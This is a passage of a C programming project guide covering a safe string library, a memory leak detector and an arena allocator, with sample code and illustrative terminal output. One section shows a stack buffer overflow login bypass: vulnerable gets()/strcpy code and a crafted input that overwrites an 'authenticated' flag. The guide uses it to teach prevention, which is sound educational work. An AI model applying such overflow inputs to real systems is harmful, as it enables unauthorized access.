  • File: SPRINT_1_REAL_WORLD_PROJECTS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Rust, Zig, C++
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The “Resume Gold” (Educational/Personal Brand)
  • Difficulty: Level 2: Intermediate (The Developer)
  • Knowledge Area: Memory Safety, Systems Programming
  • Software or Tool: GCC, Valgrind, AddressSanitizer
  • Main Book: “The C Programming Language” - Kernighan & Ritchie

What you’ll build: A bounds-checked string library in C (safe_strlen, safe_strcpy, safe_strcat, safe_substr) that prevents buffer overflows by design.

Why it teaches memory & control: C strings are the perfect teacher for memory danger. Every function forces you to think: “Where does this string end? How big is the destination? What happens if I’m wrong?” By building safe versions, you must first understand exactly how the unsafe versions fail.

Core challenges you’ll face:

  • Finding the null terminator by walking memory byte-by-byte (maps to: string representation)
  • Preventing writes past buffer boundaries (maps to: buffer overflow)
  • Understanding why strcpy(dest, src) has no idea how big dest is (maps to: why C doesn’t protect you)
  • Handling the case where source has no null terminator (maps to: undefined behavior is real)
  • Pointer arithmetic to implement substr (maps to: pointer arithmetic)

Key Concepts:

| Concept | Resource |
|---------|----------|
| C string internals | “The C Programming Language” Ch. 5 - Kernighan & Ritchie |
| Why %s is dangerous | CWE-134: Uncontrolled Format String |
| Buffer overflow mechanics | “Understanding and Using C Pointers” Ch. 5 - Richard Reese |

  • Difficulty: Beginner-Intermediate
  • Time estimate: Weekend
  • Prerequisites: Project 1 or equivalent comfort with addresses


Real World Outcome

When you run your safe string library test suite, you’ll see comprehensive output demonstrating how your library prevents the buffer overflows that plague unsafe C string functions. Here are the real terminal outputs you’ll produce:

Example 1: Safe vs Unsafe String Copy Comparison

$ ./test_safe_strings

=== TESTING SAFE STRING LIBRARY ===

[TEST 1: Basic safe_strcpy]
Source: "Hello, World!" (13 chars + null = 14 bytes)
Destination buffer size: 20 bytes

Result: ✓ PASS
  Copied: "Hello, World!"
  Bytes written: 14
  Buffer remaining: 6 bytes

[TEST 2: Overflow Prevention]
Source: "This is a very long string that will not fit!" (45 chars)
Destination buffer size: 10 bytes

safe_strcpy result: ✓ PREVENTED OVERFLOW
  Truncated to: "This is a"
  Bytes written: 10 (including null terminator)
  Original length: 45
  Truncated: 36 characters
  Warning: String was truncated!

COMPARISON - What strcpy() would do:
Running with standard strcpy()...
Source: "This is a very long string that will not fit!"
Destination buffer: [10 bytes]

CRASH! Segmentation fault (core dumped)
==12345==ERROR: AddressSanitizer: stack-buffer-overflow
WRITE of size 46 at 0x7ffc8b2a1234
  Buffer size: 10 bytes
  Attempted write: 46 bytes
  Overflow: 36 bytes beyond buffer!

Adjacent memory corrupted:
  Variable 'canary' was: 0xDEADBEEF
  Variable 'canary' now: 0x676E6F6C  ← CORRUPTED!

Example 2: Safe String Concatenation

$ ./test_safe_strings --test-concat

[TEST 3: safe_strcat - Normal Operation]
Initial string: "Hello"  (5 chars, buffer size: 50)
Concatenating: ", World!" (8 chars)

Result: ✓ PASS
  Final string: "Hello, World!"
  Total length: 13 chars
  Buffer capacity: 50 bytes
  Space remaining: 36 bytes

[TEST 4: safe_strcat - Overflow Prevention]
Initial string: "Hello"  (5 chars, buffer size: 10)
Concatenating: ", this won't fit!" (17 chars)

Result: ✓ PREVENTED OVERFLOW
  Attempted total: 22 chars
  Buffer capacity: 10 bytes
  Final string: "Hello, th"
  Truncated: 13 characters dropped
  Return code: -1 (EOVERFLOW)
  Error message: "safe_strcat: insufficient space in destination buffer"

COMPARISON - Standard strcat():
$ ./test_unsafe_concat
Segmentation fault
Memory corruption detected at 0x7ffc8b2a1250
Stack smashing detected: <unknown> terminated
Aborted (core dumped)

Example 3: Null Terminator Detection

$ ./test_safe_strings --test-strlen

[TEST 5: safe_strlen with valid strings]
String: "Hello"
safe_strlen() = 5
strlen() = 5
✓ MATCH

[TEST 6: safe_strlen with missing null terminator]
Buffer: ['H','e','l','l','o','W','o','r','l','d'] (no \0!)
Buffer size: 10 bytes

safe_strlen with max_len=10:
  ⚠️  WARNING: No null terminator found within 10 bytes
  Returned: -1 (ERROR)
  Error message: "String not properly terminated"

Standard strlen() on same buffer:
  Returned: 47  ← WRONG! Read past buffer end!
  AddressSanitizer: stack-buffer-overflow
  READ of size 1 at address beyond allocation

Demonstration:
  Buffer ends at: 0x7ffeefbff49a
  strlen() read until: 0x7ffeefbff4bf (37 bytes past buffer!)
  Accessed memory it shouldn't: YES
  Undefined behavior: YES

Example 4: Complete Test Suite Output

$ ./run_all_tests

=== SAFE STRING LIBRARY TEST SUITE ===

Testing safe_strlen():
  [✓] Normal strings (10/10 tests passed)
  [✓] Empty strings (5/5 tests passed)
  [✓] Missing null terminators detected (8/8 tests passed)
  [✓] Maximum length handling (6/6 tests passed)

Testing safe_strcpy():
  [✓] Normal copy operations (15/15 tests passed)
  [✓] Truncation when needed (12/12 tests passed)
  [✓] Return value correctness (10/10 tests passed)
  [✓] Always null-terminates (20/20 tests passed)
  [✗] FAILED: Edge case with size=0 (1/5 tests failed)

Testing safe_strcat():
  [✓] Concatenation within bounds (18/18 tests passed)
  [✓] Overflow prevention (10/10 tests passed)
  [✓] Pre-existing string handling (8/8 tests passed)

Testing safe_substr():
  [✓] Valid substring extraction (15/15 tests passed)
  [✓] Out-of-bounds detection (12/12 tests passed)
  [✓] Length limiting (9/9 tests passed)

=== COMPARISON WITH STANDARD LIBRARY ===

Buffer overflow attempts caught by safe library: 45
  - strcpy overflows prevented: 18
  - strcat overflows prevented: 15
  - Read-past-end prevented: 12

Same tests with standard library:
  - Crashes: 38
  - Silent corruption: 7
  - Correct behavior: 0 (all would overflow!)

AddressSanitizer detected issues: 45/45
All issues were prevented by safe_string library!

=== SUMMARY ===
Total tests: 163
Passed: 162
Failed: 1
Success rate: 99.4%

Memory safety: 100% (0 leaks, 0 use-after-free, 0 buffer overflows)

The safe_string library successfully prevents all buffer overflows
that would crash or corrupt memory with standard C string functions!

Example 5: Real-World Security Demonstration

$ ./demo_exploit_prevention

=== BUFFER OVERFLOW EXPLOIT DEMONSTRATION ===

Scenario: Login bypass via buffer overflow
----------------------------------------

Vulnerable code using strcpy():
  char password[16];
  int authenticated = 0;

  printf("Enter password: ");
  gets(password);  // or strcpy(password, user_input)

  if (authenticated) { grant_access(); }

[ATTACK 1: Standard strcpy]
Input: "AAAAAAAAAAAAAAAA\x01\x00\x00\x00" (20 bytes)

Memory before:
  0x7ffc1000: [password buffer - 16 bytes]
  0x7ffc1010: [authenticated = 0x00000000]

Memory after strcpy():
  0x7ffc1000: [A A A A A A A A A A A A A A A A]
  0x7ffc1010: [01 00 00 00]  ← authenticated OVERWRITTEN!

Result: Access granted! (SECURITY BREACH)

[ATTACK 2: Using safe_strcpy instead]
Input: Same 20-byte attack string

safe_strcpy(password, input, sizeof(password)):
  ⚠️  Input length (20) exceeds buffer size (16)
  ✓ Truncated to 15 chars + null terminator
  ✓ Adjacent memory protected

Memory after safe_strcpy():
  0x7ffc1000: [A A A A A A A A A A A A A A A \0]
  0x7ffc1010: [00 00 00 00]  ← authenticated UNCHANGED!

Result: Access denied (ATTACK PREVENTED)

Your safe string library prevents the buffer overflow exploit!

These outputs demonstrate that you’ve built a production-quality safe string library that prevents the exact vulnerabilities responsible for countless real-world security breaches. Your library catches errors before they corrupt memory and provides clear diagnostic information.

Learning milestones:

  1. First milestone: You understand that "hello" is actually 6 bytes, not 5
  2. Second milestone: You can explain exactly why strcpy(small_buffer, huge_string) corrupts memory
  3. Final milestone: You instinctively check buffer sizes before any string operation

The Core Question You’re Answering

“Why is strcpy considered dangerous, and what would a safe version look like?”

C strings are the source of more security vulnerabilities than almost any other language feature. By building safe alternatives, you’ll understand exactly why—and gain the instinct to think about buffer sizes before every string operation.


Concepts You Must Understand First

Stop and research these before coding:

  1. What IS a C String?
    • How is a string stored in memory? (Sequence of bytes + null terminator)
    • What is the null terminator and why is it essential? (\0 = byte value 0)
    • What happens if there’s no null terminator?
    • Book Reference: “The C Programming Language” Ch. 5.5 - Kernighan & Ritchie

String Null Terminator Visualization:

How "hello" is ACTUALLY stored in memory (6 bytes, not 5!):

String Literal: "hello"

Memory Layout:
Address:    0x1000  0x1001  0x1002  0x1003  0x1004  0x1005
           ┌─────┬─────┬─────┬─────┬─────┬─────┐
Bytes:     │ 'h' │ 'e' │ 'l' │ 'l' │ 'o' │ '\0'│
           └─────┴─────┴─────┴─────┴─────┴─────┘
Hex:        0x68  0x65  0x6C  0x6C  0x6F  0x00
                                            ▲
                                            │
                            Null terminator (essential!)

strlen("hello") = 5  (counts chars before '\0')
sizeof("hello") = 6  (includes the '\0')

WITHOUT null terminator (DANGEROUS!):
Address:    0x1000  0x1001  0x1002  0x1003  0x1004  0x1005
           ┌─────┬─────┬─────┬─────┬─────┬─────┐
Bytes:     │ 'h' │ 'e' │ 'l' │ 'l' │ 'o' │ ??? │ ← No null terminator!
           └─────┴─────┴─────┴─────┴─────┴─────┘
                                            ▲
                                            │
                            strlen() keeps reading → UNDEFINED BEHAVIOR!
                            Could read garbage, could crash


  2. String Literals vs Character Arrays
    • What’s the difference between char* s = "hello" and char s[] = "hello"?
    • Why can you modify one but not the other?
    • Where do string literals live in memory? (Read-only data section)
  3. Why Standard String Functions Are Dangerous
    • Why does strcpy(dest, src) not know the size of dest?
    • What does gets() do and why was it removed from the C standard?
    • What is a buffer overflow, mechanically?
    • Book Reference: “Effective C” Ch. 7 - Robert Seacord
  4. Pointer Arithmetic for Strings
    • Why does s + 1 point to the second character?
    • How do you iterate through a string using pointers?
    • What’s the difference between *s++ and (*s)++?
    • Book Reference: “The C Programming Language” Ch. 5.4 - Kernighan & Ritchie

Questions to Guide Your Design

Before implementing, think through these:

  1. safe_strlen
    • How does strlen find the end of a string?
    • What happens if someone passes a pointer to uninitialized memory?
    • Should you add a maximum length parameter? Why or why not?
  2. safe_strcpy
    • What parameters do you need to make this safe? (dest, src, AND dest_size)
    • What should happen if src is longer than dest_size?
    • Should you always null-terminate dest, even on truncation?
    • What should the return value indicate?
  3. safe_strcat
    • How much space is available in dest? (dest_size - strlen(dest) - 1)
    • What if dest isn’t null-terminated when passed in?
    • How do you handle the case where there’s no room to add anything?
  4. Error Handling
    • Should errors return special values, or set a global error flag?
    • What’s the trade-off between returning error codes vs silent truncation?
    • How does strlcpy (BSD) handle this differently than strncpy (ISO C)?

Thinking Exercise: Trace the Crash

Trace what happens with this code:

void vulnerable() {
    char buffer[10];
    char* input = "This string is way too long for the buffer";

    strcpy(buffer, input);  // What happens here?

    printf("Buffer: %s\n", buffer);
}

Questions while tracing:

  • Draw the stack frame for vulnerable()
  • Where is buffer located relative to the saved return address?
  • Which bytes get overwritten when strcpy runs?
  • What value will the return address have after strcpy?
  • What happens when the function tries to return?

Now trace with your safe version:

  • What would safe_strcpy(buffer, input, sizeof(buffer)) do differently?
  • What should it return to indicate the problem?

The Interview Questions They’ll Ask

Prepare to answer these:

  1. “What’s wrong with strcpy and how would you fix it?”
  2. “What is a buffer overflow? How does it lead to code execution?”
  3. “What’s the difference between strncpy and strlcpy?”
  4. “Why does "hello" take 6 bytes of memory?”
  5. “How would you implement strlen without using any library functions?”
  6. “What happens if you pass a non-null-terminated string to printf("%s", ...)?”

Hints in Layers (Only If Stuck)

Hint 1: Start with strlen

Implement `safe_strlen` first. It's just a loop that counts until it sees `\0`:

```c
size_t safe_strlen(const char* s) {
    size_t len = 0;
    while (s[len] != '\0') {
        len++;
    }
    return len;
}
```

But this still has a problem: what if `s` has no null terminator? Consider adding a maximum length parameter.

Hint 2: The safe_strcpy Signature

You need three parameters:

```c
size_t safe_strcpy(char* dest, const char* src, size_t dest_size);
```

Return the length that WOULD have been copied (like `snprintf`). This lets callers detect truncation:

```c
if (safe_strcpy(buf, str, sizeof(buf)) >= sizeof(buf)) {
    // Truncation occurred!
}
```

Hint 3: Always Null-Terminate

Unlike `strncpy`, your function should ALWAYS null-terminate (if dest_size > 0). Even on truncation, dest should be a valid string.

Hint 4: Test with AddressSanitizer

Compile with `-fsanitize=address` and test your library against the standard library:

```bash
clang -fsanitize=address -g test_overflow.c -o test
./test
```

AddressSanitizer will catch buffer overflows that would otherwise silently corrupt memory.

Books That Will Help

| Topic | Book | Chapter |
|-------|------|---------|
| C string fundamentals | “The C Programming Language” | Ch. 5.5 |
| Pointer arithmetic | “The C Programming Language” | Ch. 5.4 |
| String security issues | “Effective C” | Ch. 7 |
| Buffer overflow exploitation | “Hacking: The Art of Exploitation” | Ch. 3 |
| Secure string handling | “Secure Coding in C and C++” | Ch. 2 |

Project 3: Memory Leak Detector

  • File: SPRINT_1_REAL_WORLD_PROJECTS.md
  • Main Programming Language: C
  • Alternative Programming Languages: C++, Rust, Zig
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: Level 1: The “Resume Gold”
  • Difficulty: Level 2: Intermediate (The Developer)
  • Knowledge Area: Memory Management, Debugging
  • Software or Tool: Valgrind, AddressSanitizer
  • Main Book: Understanding and Using C Pointers by Richard Reese

What you’ll build: A wrapper around malloc/free that tracks all allocations, detects memory leaks, catches double-frees, and warns about use-after-free.

Why it teaches memory & control: This project forces you to understand ownership and lifetime. When is memory valid? When does it become garbage? How do bugs “appear later than the mistake”? You’ll build the same intuition that sanitizers provide, but by constructing it yourself.

Core challenges you’ll face:

  • Maintaining a registry of all active allocations (maps to: object lifetime rules)
  • Detecting when free() is called twice on the same pointer (maps to: double free)
  • Marking freed memory to detect use-after-free (maps to: dangling pointers)
  • Reporting file/line where allocation happened (maps to: why bugs appear later)
  • Understanding the difference between NULL, uninitialized, and dangling (maps to: pointer states)

Resources for key challenges:

Key Concepts:

| Concept | Resource |
|---------|----------|
| Object lifetime | “Understanding and Using C Pointers” Ch. 2 - Richard Reese |
| Double-free mechanics | AddressSanitizer documentation - LLVM |
| Use-after-free detection | malloc from Scratch - Tenzin Migmar |

  • Difficulty: Intermediate
  • Time estimate: 1-2 weeks
  • Prerequisites: Comfort with structs, linked lists, macros

Real World Outcome

When you complete this project, you’ll have a working memory leak detector that catches bugs at runtime. Here’s what the experience looks like:

Example 1: Detecting Memory Leaks

test_leak.c:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "leak_detector.h"

void create_user() {
    char* name = malloc(100);
    strcpy(name, "Alice");
    // Oops, forgot to free!
}

int main() {
    init_leak_detector();

    for (int i = 0; i < 3; i++) {
        create_user();
    }

    return 0;
}

Terminal output:

$ gcc -g test_leak.c leak_detector.c -o test_leak
$ ./test_leak

=== Memory Leak Detector Report ===
[LEAK] 100 bytes allocated at test_leak.c:7 (create_user) never freed
       Address: 0x600000004000
[LEAK] 100 bytes allocated at test_leak.c:7 (create_user) never freed
       Address: 0x600000004100
[LEAK] 100 bytes allocated at test_leak.c:7 (create_user) never freed
       Address: 0x600000004200

Total leaks: 3 allocations, 300 bytes

Example 2: Detecting Double-Free

test_double_free.c:

#include "leak_detector.h"

int main() {
    init_leak_detector();

    int* data = malloc(sizeof(int) * 10);
    *data = 42;

    free(data);
    free(data);  // BUG: Double free!

    return 0;
}

Terminal output:

$ ./test_double_free

[ERROR] DOUBLE-FREE DETECTED!
  Pointer: 0x600000004000
  Size: 40 bytes
  First freed at: test_double_free.c:9
  Second free at: test_double_free.c:10
  Originally allocated at: test_double_free.c:6

*** Program terminated to prevent heap corruption ***

Example 3: Detecting Use-After-Free

test_use_after_free.c:

#include "leak_detector.h"
#include <stdio.h>

int main() {
    init_leak_detector();

    int* numbers = malloc(5 * sizeof(int));
    numbers[0] = 100;
    printf("Before free: numbers[0] = %d\n", numbers[0]);

    free(numbers);

    // BUG: Accessing freed memory
    printf("After free: numbers[0] = %d\n", numbers[0]);

    return 0;
}

Terminal output:

$ ./test_use_after_free

Before free: numbers[0] = 100

[WARNING] POSSIBLE USE-AFTER-FREE DETECTED!
  Reading from: 0x600000004000
  This memory was freed at: test_use_after_free.c:11
  Originally allocated at: test_use_after_free.c:7 (20 bytes)
  Memory has been poisoned with pattern: 0xDEADBEEF

After free: numbers[0] = -559038737

Example 4: Clean Program (No Leaks)

test_clean.c:

#include "leak_detector.h"
#include <stdio.h>
#include <string.h>

void process_data() {
    char* buffer = malloc(256);
    strcpy(buffer, "Clean program!");
    printf("%s\n", buffer);
    free(buffer);  // Properly freed!
}

int main() {
    init_leak_detector();

    process_data();

    return 0;
}

Terminal output:

$ ./test_clean

Clean program!

=== Memory Leak Detector Report ===
No memory leaks detected!
Total allocations: 1
Total frees: 1
All memory properly cleaned up.

Step-by-Step: What You See

  1. During Development:
    • Include your leak_detector.h header
    • Call init_leak_detector() at program start
    • Your detector intercepts malloc() and free() calls via macros in every file that includes the header
  2. At Runtime:
    • Each allocation is registered with file/line information
    • Each free is validated against the registry
    • Double-frees are caught immediately
    • Freed memory is “poisoned” with 0xDEADBEEF pattern
  3. At Program Exit:
    • The atexit() handler runs automatically
    • All unfreed allocations are reported with their source locations
    • You get a complete leak report without any extra work
  4. Understanding the Output:
    • File:Line - Shows exactly where malloc() was called
    • Address - The actual memory address (helps correlate with debugger)
    • Size - How many bytes were leaked
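    • Poisoning - Freed memory is filled with a recognizable pattern (0xDEADBEEF in the sample output above; a repeated 0xDE byte works equally well), which makes use-after-free obvious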

Learning milestones:

  1. First milestone: You understand why freeing memory doesn’t zero it out
  2. Second milestone: You can explain why use-after-free sometimes “works” and sometimes crashes
  3. Final milestone: You think about every malloc in terms of “who frees this and when”

The Core Question You’re Answering

“Who owns this memory, and when does it become invalid?”

This is the fundamental question of memory management. In garbage-collected languages, the runtime handles this. In C, YOU handle it. And when you get it wrong, the bugs are often silent, appearing far from where the mistake was made.


Concepts You Must Understand First

Stop and research these before coding:

  1. Object Lifetime
    • When does memory become “alive” (usable)?
    • When does it become “dead” (invalid)?
    • Why can you still read “dead” memory in C? (The bytes are still there!)
    • Book Reference: “Understanding and Using C Pointers” Ch. 2 - Richard Reese
  2. The Three Pointer States
    • NULL: Explicitly points to nothing (int* p = NULL;)
    • Valid: Points to allocated, live memory
    • Dangling: Points to memory that was freed—looks valid but isn’t
    • Why is dangling the most dangerous? (Nothing about the pointer value itself reveals that it is stale!)
  3. Why Bugs Appear Later Than Mistakes
    • What happens immediately when you call free(p)? (Almost nothing visible)
    • When does use-after-free actually crash? (When the memory is reused)
    • Why is this timing unpredictable?
    • Book Reference: “Effective C” Ch. 6 - Robert Seacord
  4. Heap Allocator Metadata
    • What does the allocator store alongside your data?
    • How does free(p) know how many bytes to free?
    • What happens when this metadata gets corrupted?
    • Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 9.9 - Bryant & O’Hallaron

Questions to Guide Your Design

Before implementing, think through these:

  1. Tracking Allocations
    • What data structure will you use to track active allocations? (Hash table? Linked list?)
    • What information do you need to store per allocation? (Address, size, file, line)
    • How do you associate this metadata with the pointer the user receives?
  2. Wrapping malloc/free
    • How do you intercept malloc and free calls?
    • Option 1: Macros that redefine malloc and free
    • Option 2: Wrapper functions my_malloc, my_free
    • How do you capture __FILE__ and __LINE__ at the call site?
  3. Detecting Double-Free
    • When free(p) is called, how do you check if p was already freed?
    • Should you keep freed entries in your registry, or remove them?
    • What if you keep them—how do you prevent the registry from growing forever?
  4. Detecting Use-After-Free
    • This is HARD without hardware support. What can you do?
    • Option: Fill freed memory with a magic pattern (0xDEADBEEF)
    • Option: Keep freed allocations in a “quarantine” before recycling
    • Why can’t you catch all use-after-free at runtime?
  5. Detecting Leaks
    • When do you report leaks? (At program exit)
    • How do you ensure your leak report runs? (atexit())
    • What information makes a leak report useful?

Thinking Exercise: Trace the Bug

Trace what happens with this code:

void create_user() {
    char* name = malloc(100);
    strcpy(name, "Alice");
    // Oops, forgot to free or return name
}

int main() {
    for (int i = 0; i < 1000; i++) {
        create_user();
    }
    // 100,000 bytes leaked!
    return 0;
}

Questions while tracing:

  • How would your detector report this leak?
  • What file and line would you report?
  • How much total memory was leaked?

Now trace this:

int main() {
    int* p = malloc(sizeof(int));
    *p = 42;
    free(p);
    // p is now dangling

    int* q = malloc(sizeof(int));
    *q = 100;
    // q might get the same address as p!

    printf("*p = %d\n", *p);  // Use-after-free!
    // Might print 100, might print 42, might crash
}

Questions:

  • Why might *p print 100?
  • How could your detector catch this?
  • What magic value could you write to freed memory?

The Interview Questions They’ll Ask

Prepare to answer these:

  1. “What is a memory leak? How do you detect them?”
  2. “What is use-after-free? Why is it dangerous for security?”
  3. “What is double-free? What can go wrong?”
  4. “How does Valgrind detect memory errors?”
  5. “What’s the difference between a dangling pointer and a NULL pointer?”
  6. “If you free memory, why can you sometimes still read from it?”

Hints in Layers (Only If Stuck)

Hint 1: Use Macros to Capture Call Site

Define macros that wrap your functions:

```c
#define malloc(size) debug_malloc(size, __FILE__, __LINE__)
#define free(ptr) debug_free(ptr, __FILE__, __LINE__)

void* debug_malloc(size_t size, const char* file, int line);
void debug_free(void* ptr, const char* file, int line);
```

Now every `malloc` call automatically captures where it happened.

Hint 2: Simple Registry Structure

A linked list works fine for a learning project:

```c
typedef struct Allocation {
    void* ptr;
    size_t size;
    const char* file;
    int line;
    int freed;  // 0 = active, 1 = freed
    struct Allocation* next;
} Allocation;

static Allocation* registry = NULL;
```

Hint 3: Poison Freed Memory

When freeing, fill the memory with a recognizable pattern:

```c
void debug_free(void* ptr, const char* file, int line) {
    Allocation* alloc = find_allocation(ptr);
    if (alloc) {
        memset(ptr, 0xDE, alloc->size);  // Poison with 0xDE
        alloc->freed = 1;
    }
    free(ptr);
}
```

If you later read `0xDEDEDEDE`, you know it's use-after-free.

Hint 4: Report Leaks at Exit

Use `atexit()` to register a cleanup function:

```c
void report_leaks(void) {
    for (Allocation* a = registry; a; a = a->next) {
        if (!a->freed) {
            printf("[LEAK] %zu bytes at %s:%d\n", a->size, a->file, a->line);
        }
    }
}

// In your init or first malloc:
static int initialized = 0;
if (!initialized) {
    atexit(report_leaks);
    initialized = 1;
}
```

Books That Will Help

| Topic | Book | Chapter |
|-------|------|---------|
| Pointer lifetime and ownership | “Understanding and Using C Pointers” | Ch. 2 |
| Heap allocator internals | “Computer Systems: A Programmer’s Perspective” | Ch. 9.9 |
| Memory debugging techniques | “The Art of Debugging with GDB, DDD, and Eclipse” | Ch. 5 |
| Secure memory handling | “Effective C” | Ch. 6 |
| Valgrind and sanitizers | “The Linux Programming Interface” | Ch. 7 |

Project 4: Arena Allocator

  • File: SPRINT_1_REAL_WORLD_PROJECTS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Rust, Zig, C++
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: Level 1: The “Resume Gold”
  • Difficulty: Level 2: Intermediate (The Developer)
  • Knowledge Area: Memory Management, Allocators
  • Software or Tool: mmap, Custom Memory Allocator
  • Main Book: C Interfaces and Implementations by David Hanson

What you’ll build: A bump/arena allocator that allocates memory from a pre-allocated block, with O(1) allocation and bulk-free semantics.

Why it teaches memory & control: This is where you understand why allocators exist. You’ll see that malloc is just software—someone wrote it. By building the simplest possible allocator, you understand memory as a raw resource to be carved up, not a magic service.

Core challenges you’ll face:

  • Requesting a large block from the OS with mmap or malloc (maps to: why allocators exist)
  • Maintaining a “bump pointer” that advances with each allocation (maps to: heap layout)
  • Handling alignment requirements (maps to: memory layout details)
  • Implementing reset/free-all (maps to: lifetime management)
  • Understanding when arena allocation is appropriate vs general-purpose (maps to: allocator design)

Resources for key challenges:

Key Concepts:

| Concept | Resource |
|---------|----------|
| Arena/bump allocation | malloc() from Scratch - Tenzin Migmar |
| Memory alignment | “Understanding and Using C Pointers” Ch. 1 - Richard Reese |
| mmap system call | Master memory management - 42 Studio |

  • Difficulty: Intermediate
  • Time estimate: Weekend - 1 week
  • Prerequisites: Project 3 or understanding of malloc/free

Real World Outcome

When you complete this project, you’ll have a blazingly fast arena allocator that demonstrates the power of specialized memory management. Here’s what you’ll experience:

Example 1: Basic Arena Usage

test_arena.c:

#include "arena.h"
#include <stdio.h>
#include <string.h>

typedef struct {
    char name[50];
    int score;
} Player;

int main() {
    // Create a 1MB arena
    Arena* arena = arena_create(1024 * 1024);
    printf("Arena created: %zu bytes\n\n", arena->capacity);

    // Allocate some players
    Player* p1 = arena_alloc(arena, sizeof(Player));
    strcpy(p1->name, "Alice");
    p1->score = 100;
    printf("After allocating p1:\n");
    printf("  Used: %zu bytes\n", arena->offset);
    printf("  Free: %zu bytes\n\n", arena->capacity - arena->offset);

    Player* p2 = arena_alloc(arena, sizeof(Player));
    strcpy(p2->name, "Bob");
    p2->score = 200;
    printf("After allocating p2:\n");
    printf("  Used: %zu bytes\n", arena->offset);
    printf("  Free: %zu bytes\n\n", arena->capacity - arena->offset);

    int* scores = arena_alloc(arena, 100 * sizeof(int));
    printf("After allocating 100 integers:\n");
    printf("  Used: %zu bytes\n", arena->offset);
    printf("  Free: %zu bytes\n\n", arena->capacity - arena->offset);

    // Reset everything at once - O(1)!
    arena_reset(arena);
    printf("After arena_reset():\n");
    printf("  Used: %zu bytes (back to zero!)\n", arena->offset);
    printf("  Free: %zu bytes (all available again!)\n\n", arena->capacity - arena->offset);

    arena_destroy(arena);
    return 0;
}

Terminal output (on a typical 64-bit platform, where sizeof(Player) is 56: 50 bytes of name, 2 bytes of padding, 4 bytes of score):

$ gcc -g test_arena.c arena.c -o test_arena
$ ./test_arena

Arena created: 1048576 bytes

After allocating p1:
  Used: 56 bytes
  Free: 1048520 bytes

After allocating p2:
  Used: 112 bytes
  Free: 1048464 bytes

After allocating 100 integers:
  Used: 512 bytes
  Free: 1048064 bytes

After arena_reset():
  Used: 0 bytes (back to zero!)
  Free: 1048576 bytes (all available again!)

Example 2: Visual Bump Pointer Advancement

test_visual.c:

#include "arena.h"
#include <stdio.h>

void print_arena_state(Arena* arena, const char* label) {
    printf("%s\n", label);
    printf("├─ Base:     %p\n", (void*)arena->base);
    printf("├─ Current:  %p (base + %zu)\n",
           (void*)(arena->base + arena->offset), arena->offset);
    printf("├─ Capacity: %zu bytes\n", arena->capacity);
    printf("└─ Used:     %.2f%%\n\n",
           (arena->offset * 100.0) / arena->capacity);
}

int main() {
    Arena* arena = arena_create(1024);
    print_arena_state(arena, "Initial state:");

    void* a = arena_alloc(arena, 100);
    print_arena_state(arena, "After arena_alloc(100):");

    void* b = arena_alloc(arena, 200);
    print_arena_state(arena, "After arena_alloc(200):");

    void* c = arena_alloc(arena, 300);
    print_arena_state(arena, "After arena_alloc(300):");

    arena_destroy(arena);
    return 0;
}

Terminal output:

$ ./test_visual

Initial state:
├─ Base:     0x100204000
├─ Current:  0x100204000 (base + 0)
├─ Capacity: 1024 bytes
└─ Used:     0.00%

After arena_alloc(100):
├─ Base:     0x100204000
├─ Current:  0x100204064 (base + 100)
├─ Capacity: 1024 bytes
└─ Used:     9.77%

After arena_alloc(200):
├─ Base:     0x100204000
├─ Current:  0x10020412c (base + 300)
├─ Capacity: 1024 bytes
└─ Used:     29.30%

After arena_alloc(300):
├─ Base:     0x100204000
├─ Current:  0x100204258 (base + 600)
├─ Capacity: 1024 bytes
└─ Used:     58.59%

Example 3: Performance Benchmark vs malloc

benchmark.c:

#include "arena.h"
#include <stdio.h>
#include <time.h>
#include <stdlib.h>

#define ITERATIONS 1000000

void benchmark_malloc() {
    clock_t start = clock();

    void* ptrs[100];
    for (int i = 0; i < ITERATIONS; i++) {
        for (int j = 0; j < 100; j++) {
            ptrs[j] = malloc(64);
        }
        for (int j = 0; j < 100; j++) {
            free(ptrs[j]);
        }
    }

    clock_t end = clock();
    double elapsed = (double)(end - start) / CLOCKS_PER_SEC;
    printf("malloc/free:  %.3f seconds\n", elapsed);
}

void benchmark_arena() {
    clock_t start = clock();

    Arena* arena = arena_create(64 * 100);  // Big enough for 100 allocations

    for (int i = 0; i < ITERATIONS; i++) {
        for (int j = 0; j < 100; j++) {
            arena_alloc(arena, 64);
        }
        arena_reset(arena);  // O(1) reset!
    }

    arena_destroy(arena);

    clock_t end = clock();
    double elapsed = (double)(end - start) / CLOCKS_PER_SEC;
    printf("Arena alloc:  %.3f seconds\n", elapsed);
}

int main() {
    printf("Benchmarking %d iterations of 100 allocations each...\n\n", ITERATIONS);

    benchmark_malloc();
    benchmark_arena();

    return 0;
}

Terminal output:

$ gcc -O2 benchmark.c arena.c -o benchmark
$ ./benchmark

Benchmarking 1000000 iterations of 100 allocations each...

malloc/free:  8.342 seconds
Arena alloc:  0.241 seconds

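In this run the arena version is about 34.6x faster (8.342 s / 0.241 s). The program does not print this ratio itself, and absolute timings depend on your machine, compiler, and malloc implementation.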

Example 4: Real-World Game Frame Simulation

game_frame.c:

#include "arena.h"
#include <stdio.h>
#include <stdlib.h>

typedef struct {
    float x, y, z;
} Vector3;

typedef struct {
    char name[32];
    Vector3 position;
    Vector3 velocity;
} Entity;

void simulate_frame(Arena* frame_arena, int frame_num) {
    // Allocate temporary data for this frame
    Entity* entities = arena_alloc(frame_arena, 1000 * sizeof(Entity));
    Vector3* temp_vectors = arena_alloc(frame_arena, 500 * sizeof(Vector3));
    char* debug_buffer = arena_alloc(frame_arena, 4096);

    // Simulate frame...
    snprintf(debug_buffer, 4096, "Frame %d: 1000 entities, 500 vectors", frame_num);

    printf("Frame %d - Arena used: %zu bytes\n", frame_num, frame_arena->offset);

    // At end of frame, reset everything - O(1)!
    // No need to free individual allocations
}

int main() {
    Arena* frame_arena = arena_create(1024 * 1024);  // 1MB per frame

    printf("Simulating game frames...\n\n");

    for (int i = 0; i < 5; i++) {
        simulate_frame(frame_arena, i + 1);
        arena_reset(frame_arena);  // Reset for next frame
        printf("  Reset complete - ready for next frame\n\n");
    }

    arena_destroy(frame_arena);
    printf("Game simulation complete!\n");

    return 0;
}

Terminal output (1000 × 56 + 500 × 12 + 4096 = 66096 bytes, assuming 4-byte floats and no struct padding):

$ ./game_frame
